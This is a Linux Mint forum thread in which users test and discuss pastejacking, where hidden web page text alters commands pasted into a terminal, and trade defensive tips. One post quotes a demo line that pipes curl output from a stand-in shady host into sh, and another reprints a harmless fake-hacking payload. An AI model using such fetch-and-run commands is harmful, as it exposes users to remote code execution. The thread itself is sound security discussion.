Possible Exploit with Copy/Paste to Terminal?

Forum rules
Before you post please read how to get help
Post Reply
D Canard
Level 3
Level 3
Posts: 106
Joined: Sat Dec 01, 2018 11:41 am

Possible Exploit with Copy/Paste to Terminal?

Post by D Canard »

Here, perhaps, is an object lesson in the dangers of laziness when working with BASH or PowerShell or other terminal environments.

Command line stuff is often complicated and it is easy to make typos that are hard to see if you are tired, stressed and/or inexperienced, so people often copy commands from websites that offer instructions on how to do or fix something.

This copy/pasting of commands apparently can be exploited.

A techie friend, who brought this to my attentions, has tested the (non-dangerous, not run as root) exploit demo outlined in the link below on his Android phone, and it works for him.

http://lifepluslinux.blogspot.com/2017/ ... te-to.html

This is cool in a worrisome sort of way. But I am pleased to say it doesn't work in my terminal on Linux Mint 20 copying from Vivaldi. I just get the normal output I would get from running ls -lat.

It I copy/paste the selection from the website into a text only app or paste without formatting into a word-processor app, I just get the text, ls-lat.

If I inspect the element, ls -lat, in the web page with Vivaldi's dev-tools, I can see that something is very wrong, but what is wrong seems not to copy/paste over.

Notwithstanding, I do copy/paste of command line code all the time. I guess I shouldn't be so lazy.
User avatar
xenopeek
Level 25
Level 25
Posts: 25316
Joined: Wed Jul 06, 2011 3:58 am
Location: The Netherlands

Re: Possible Exploit with Copy/Paste to Terminal?

Post by xenopeek »

I tried both in Firefox and Chromium but neither copies invisible text so only the also in the browser visible "ls -lat" text is copied. I had to remove the "malicious" class from the span with the hidden text on the webpage to make it visible to be able to copy the (no longer) hidden text from Firefox or Chromium. Gnome Web did copy the text without having to make it visible.

I use Tilix as terminal and it prompted me with a warning when pasting the copied text with the malicious part in it:
Image

Gnome Terminal just ran it. I guess Gnome Web and Gnome Terminal could do with some improvement.
Image
User avatar
Flemur
Level 19
Level 19
Posts: 9344
Joined: Mon Aug 20, 2012 9:41 pm
Location: Potemkin Village

Re: Possible Exploit with Copy/Paste to Terminal?

Post by Flemur »

I just get ls -lat in two terminals, two browsers and leafpad. I pasted it into leafpad, saved it as ls.txt, and then

Code: Select all

$ od -a ls.txt
0000000   l   s  sp   -   l   a   t
0000007
Please edit your original post title to include [SOLVED] if/when it is solved!
Your data and OS are backed up....right?
User avatar
MrEen
Level 23
Level 23
Posts: 18140
Joined: Mon Jun 12, 2017 8:39 pm

Re: Possible Exploit with Copy/Paste to Terminal?

Post by MrEen »

Interesting.

I selected the text in Brave, and on right click I have the option to "Search Google for "ls;clear..." etc, but when choosing Copy, it only copied the ls -lat.
User avatar
Termy
Level 7
Level 7
Posts: 1586
Joined: Mon Sep 04, 2017 8:49 pm
Location: UK
Contact:

Re: Possible Exploit with Copy/Paste to Terminal?

Post by Termy »

There is nothing between ls and -lat for me, but I don't just allow every site script access. This is definitely worrisome though, if this is somehow catching people out. :? As if copy-pasting weren't problematic enough already.

BTW, the commands it was supposed to run are:

Code: Select all

; clear; echo 'Haha! You gave me access to your computer with sudo!';
echo -ne 'h4cking ##                        (10%)\r';
sleep 0.3;
echo -ne 'h4cking ###                       (20%)\r';
sleep 0.3;
echo -ne 'h4cking #####                     (33%)\r';
sleep 0.3;
echo -ne 'h4cking #######                   (40%)\r';
sleep 0.3;
echo -ne 'h4cking ##########                (50%)\r';
sleep 0.3;
echo -ne 'h4cking #############             (66%)\r';
sleep 0.3;
echo -ne 'h4cking #####################     (99%)\r';
sleep 0.3;
echo -ne 'h4cking #######################   (100%)\r';
echo -ne '\n'; 
echo 'Hacking complete.';
echo 'Use GUI interface using visual basic to track my IP'<br /> ls
I got it from the page's source.

I suppose you can avoid something like this catching you out by pasting first in an editor. That said, not everyone will understand what they're looking at.
I use Linux Mint 18.3 with Cinnamon in a VirtualBox VM for testing & sandboxing.

I'm LearnLinux (LL) on YouTube: https://www.youtube.com/c/learnlinux
I'm also terminalforlife (TFL) on GitHub: https://github.com/terminalforlife
User avatar
BenTrabetere
Level 6
Level 6
Posts: 1470
Joined: Sat Jul 19, 2014 12:04 am
Location: Hattiesburg, MS USA

Re: Possible Exploit with Copy/Paste to Terminal?

Post by BenTrabetere »

The exploit did not work for me with Firefox and Gnome Terminal. I just got output from ls -lat.

The article claims, "This can be worse. If the code snippet had a command with sudo for instance, the malicious code will have sudo access too."

Please correct me if I am wrong, but if this was an exploit and it the command had sudo, you would still have to enter your password in order for the command to work. Yes? (It upsets me to think that too many people would enter a password without hesitation.)

@Termy
+1 for pasting commands to a text editor before pasting to a terminal. I have been doing that for several years.
User avatar
xenopeek
Level 25
Level 25
Posts: 25316
Joined: Wed Jul 06, 2011 3:58 am
Location: The Netherlands

Re: Possible Exploit with Copy/Paste to Terminal?

Post by xenopeek »

BenTrabetere wrote:
Mon Jan 25, 2021 12:04 am
if this was an exploit and it the command had sudo, you would still have to enter your password
Yes.
Image
mmphosis
Level 1
Level 1
Posts: 11
Joined: Sat Apr 11, 2020 11:22 pm

Re: Possible Exploit with Copy/Paste to Terminal?

Post by mmphosis »

One of the many things that I turn off in the Firefox about:config

dom.event.clipboardevents.enabled

https://briantracy.xyz/writing/copy-paste-shell.html
User avatar
Termy
Level 7
Level 7
Posts: 1586
Joined: Mon Sep 04, 2017 8:49 pm
Location: UK
Contact:

Re: Possible Exploit with Copy/Paste to Terminal?

Post by Termy »

mmphosis wrote:
Thu Jan 28, 2021 12:36 am
dom.event.clipboardevents.enabled
Very nice! I'm going to incorporate a check for that into UbuChk. :D I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?

Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?
I use Linux Mint 18.3 with Cinnamon in a VirtualBox VM for testing & sandboxing.

I'm LearnLinux (LL) on YouTube: https://www.youtube.com/c/learnlinux
I'm also terminalforlife (TFL) on GitHub: https://github.com/terminalforlife
User avatar
xenopeek
Level 25
Level 25
Posts: 25316
Joined: Wed Jul 06, 2011 3:58 am
Location: The Netherlands

Re: Possible Exploit with Copy/Paste to Terminal?

Post by xenopeek »

dom.event.clipboardevents.enabled is 'true' in my Firefox so I would expect that website to do something scary but it doesn't?

When I copy the text in the red bar and paste it here, I do get this: echo "this could have been [curl http://myShadySite.com | sh]"

But on the terminal it again only pastes the visible text: echo "looks safe to me!". And it also prints "looks safe to me!" and nothing more.
Image
User avatar
Termy
Level 7
Level 7
Posts: 1586
Joined: Mon Sep 04, 2017 8:49 pm
Location: UK
Contact:

Re: Possible Exploit with Copy/Paste to Terminal?

Post by Termy »

xenopeek wrote:
Thu Jan 28, 2021 10:12 am
But on the terminal it again only pastes the visible text: echo "looks safe to me!". And it also prints "looks safe to me!" and nothing more.
Do you have scripting allowed for the page? You might actually have some other feature in place in your browser to protect against this. I use NoScript which blocks scripts unless I allow it.
I use Linux Mint 18.3 with Cinnamon in a VirtualBox VM for testing & sandboxing.

I'm LearnLinux (LL) on YouTube: https://www.youtube.com/c/learnlinux
I'm also terminalforlife (TFL) on GitHub: https://github.com/terminalforlife
User avatar
xenopeek
Level 25
Level 25
Posts: 25316
Joined: Wed Jul 06, 2011 3:58 am
Location: The Netherlands

Re: Possible Exploit with Copy/Paste to Terminal?

Post by xenopeek »

As I shared, it does change the copied text when pasting here:
xenopeek wrote:
Thu Jan 28, 2021 10:12 am
When I copy the text in the red bar and paste it here, I do get this: echo "this could have been [curl http://myShadySite.com | sh]"
Image
User avatar
Termy
Level 7
Level 7
Posts: 1586
Joined: Mon Sep 04, 2017 8:49 pm
Location: UK
Contact:

Re: Possible Exploit with Copy/Paste to Terminal?

Post by Termy »

Oh yeah -- my bad. I misread.
I use Linux Mint 18.3 with Cinnamon in a VirtualBox VM for testing & sandboxing.

I'm LearnLinux (LL) on YouTube: https://www.youtube.com/c/learnlinux
I'm also terminalforlife (TFL) on GitHub: https://github.com/terminalforlife
mmphosis
Level 1
Level 1
Posts: 11
Joined: Sat Apr 11, 2020 11:22 pm

Re: Possible Exploit with Copy/Paste to Terminal?

Post by mmphosis »

Termy wrote:
Thu Jan 28, 2021 9:28 am
mmphosis wrote:
Thu Jan 28, 2021 12:36 am
dom.event.clipboardevents.enabled
Very nice! I'm going to incorporate a check for that into UbuChk. :D I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?

Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?
Cool perl script project! The whole "Firefox about:config" is a topic onto itself. I have a about 10 preferences set to false (unless otherwise specified) for personal preference and added security/privacy:
browser.backspace_action=2
geo.enabled
extensions.pocket.enabled
network.http.sendRefererHeader=0
browser.newtabpage.enabled
browser.urlbar.trimURLs
keyword.enabled
browser.fixup.alternate.enabled
media.autoplay.enabled
Here is a reference for many many more: https://github.com/arkenfox/user.js/blob/master/user.js

I also install uBlock Origin and uMatrix.

I use TenFourFox a Firefox-based browser for PowerPC Mac and the settings work the same as Firefox on Linux Mint. Some setting types change with newer and older versions of Firefox.
User avatar
Termy
Level 7
Level 7
Posts: 1586
Joined: Mon Sep 04, 2017 8:49 pm
Location: UK
Contact:

Re: Possible Exploit with Copy/Paste to Terminal?

Post by Termy »

mmphosis wrote:
Thu Jan 28, 2021 6:55 pm
...
Thank you muchly! I'll look into all of those. Very cool stuff.

Update:

From looking into this a bit and actually starting to add it to UbuChk, I've ran into some walls. Firefox does NOT make this process easy. :? Might make a thread for this, to see if anyone has managed to do this successfully, plus I don't want to derail this thread. It might just not be viable for UbuChk, sadly. :(

Done, in-case anyone is curious: viewtopic.php?f=213&t=341311
I use Linux Mint 18.3 with Cinnamon in a VirtualBox VM for testing & sandboxing.

I'm LearnLinux (LL) on YouTube: https://www.youtube.com/c/learnlinux
I'm also terminalforlife (TFL) on GitHub: https://github.com/terminalforlife
FreedomTruth
Level 4
Level 4
Posts: 435
Joined: Fri Sep 23, 2016 10:19 am

Re: Possible Exploit with Copy/Paste to Terminal?

Post by FreedomTruth »

xenopeek wrote:
Mon Jan 25, 2021 3:53 am
BenTrabetere wrote:
Mon Jan 25, 2021 12:04 am
if this was an exploit and it the command had sudo, you would still have to enter your password
Yes.
I realize I'm posting a month late to the discussion, but this may still be helpful to point out.
One thing about "sudo" use is that once you successfully use sudo in a terminal, you do not need to reenter your password to use it again for a set time (5 minutes?). Thus, if a user had recently run a sudo command, and then blindly pasted a malicious sudo command, it *could* run without re-asking for the password.
If you abide in My word, you are My disciples indeed. And you shall know the truth, and the truth shall make you free... Most assuredly, I say to you, whoever commits sin is a slave of sin... Therefore if the Son makes you free, you shall be free indeed.
User avatar
Termy
Level 7
Level 7
Posts: 1586
Joined: Mon Sep 04, 2017 8:49 pm
Location: UK
Contact:

Re: Possible Exploit with Copy/Paste to Terminal?

Post by Termy »

Yeah -- the password (credentials, specifically) is cached for 15 minutes, by default; this is mentioned in the sudo(8) manual page. This can be adjusted, however, to be as long or short as you like, by editing the '/etc/sudoers' file. Look at the sudoers(5) manual page for information on how to change this: man sudoers
I use Linux Mint 18.3 with Cinnamon in a VirtualBox VM for testing & sandboxing.

I'm LearnLinux (LL) on YouTube: https://www.youtube.com/c/learnlinux
I'm also terminalforlife (TFL) on GitHub: https://github.com/terminalforlife
User avatar
xenopeek
Level 25
Level 25
Posts: 25316
Joined: Wed Jul 06, 2011 3:58 am
Location: The Netherlands

Re: Possible Exploit with Copy/Paste to Terminal?

Post by xenopeek »

You can run sudo -k to reset that timer so next sudo command will ask the password again. Also, the timer is per session: if you open a new terminal, or a new tab in your terminal, the first sudo command on that will always ask the password.
Image
Post Reply

Return to “Scripts & Bash”